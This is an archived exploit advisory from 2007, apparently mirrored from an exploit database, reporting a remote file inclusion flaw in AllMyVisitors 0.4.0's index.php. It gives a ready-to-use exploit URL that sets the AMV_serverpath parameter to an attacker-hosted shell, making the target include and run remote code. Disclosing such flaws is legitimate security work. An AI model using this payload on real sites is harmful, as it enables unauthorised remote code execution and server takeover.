AllMyVisitors 0.4.0 (index.php) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : AllMyVisitors 0.4.0 (index.php) Remote File Inclusion Vulnerability
# Published : 2007-01-07
# Author : bd0rk
# Previous Title : AllMyLinks <= 0.5.0 (index.php) Remote File Include Vulnerability
# Next Title : NUNE News Script 2.0pre2 Multiple Remote File Include Vulnerabilities

AllMyVisitors 0.4.0 File Inclusion Vulnerability



Affected Software: AllMyVisitors 0.4.0

Download: http://www.php-resource.net//modules/AllMyLinks//action/gotolink.php?AML_linkid=11

Vulnerable Code in index.php

Bugfounder: bd0rk

[+]Exploit: http://[target]/[all_my_visitors_path]/index.php?AMV_openconfig=1&AMV_serverpath=http://[Shell]

# www.Syue.com [2007-01-07]